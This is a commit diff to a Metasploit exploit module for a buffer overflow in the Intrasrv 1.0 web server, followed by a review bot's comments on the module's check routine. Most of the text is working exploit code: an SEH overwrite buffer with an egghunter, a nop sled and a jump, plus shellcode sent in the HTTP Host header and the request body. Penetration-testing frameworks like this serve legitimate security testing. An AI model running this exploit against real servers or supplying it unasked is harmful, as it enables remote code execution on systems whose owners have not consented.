
Commit a35d548

committed
Use HttpClient
1 parent 185ef2e commit a35d548


1 file changed

+17
-22
lines changed


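--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -10,7 +10,7 @@
 class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 
-include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Egghunter
 
 def initialize(info={})
@@ -57,24 +57,15 @@ def initialize(info={})
 'Privileged' => false,
 'DisclosureDate' => "May 30 2013",
 'DefaultTarget' => 0))
-
-register_options(
-[
-OptPort.new('RPORT', [true, 'The remote port', 80])
-], self.class)
 end
 
 def check
-begin
-connect
-rescue
-print_error("Could not connect to target!")
-return Exploit::CheckCode::Safe
-end
-sock.put("GET / HTTP/1.0\r\n")
-res = sock.get
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => "/"
+})
 
-if res and res =~ /intrasrv 1.0/
+if res and res.headers['Server'] =~ /intrasrv 1.0/
 return Exploit::CheckCode::Vulnerable
 else
 return Exploit::CheckCode::Safe
@@ -88,19 +79,23 @@ def exploit
 })
 
 # setup buffer
-buf = rand_text_alpha(target['Offset']-128) # junk to egghunter
+buf = rand_text(target['Offset']-128) # junk to egghunter
 buf << make_nops(8) + hunter # nopsled + egghunter at offset-128
-buf << rand_text_alpha(target['Offset']-buf.length) # more junk to offset
+buf << rand_text(target['Offset']-buf.length) # more junk to offset
 buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
 buf << [target.ret].pack("V*") # seh
 
-# attach egg tag to payload
-shellcode = egg + egg
+# Setup payload
+shellcode = rand_text(1) # align payload
+shellcode = egg + egg # attach egg tags
 shellcode << payload.encoded
 
 print_status("Sending buffer...")
-connect
-sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
-disconnect
+send_request_cgi({
+'method' => 'GET',
+'uri' => "/",
+'vhost' => buf,
+'data' => shellcode
+})
 end
 end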
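Review bot: In `check`, a nil `res` (timeout or refused connection) now falls into the `else` branch and reports `Exploit::CheckCode::Safe` with no message, so an unreachable host reads as not affected. Anyone using the check for exposure assessment needs those two outcomes kept apart; add `return Exploit::CheckCode::Unknown unless res` before the banner test. The match on the `Server` header only identifies the product string, so `Exploit::CheckCode::Appears` is the more accurate result than `Vulnerable`, and the dot should be escaped as `/intrasrv 1\.0/`. The body of `check` continues past the end of the hunk, so the closing `end` lines are not visible here.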
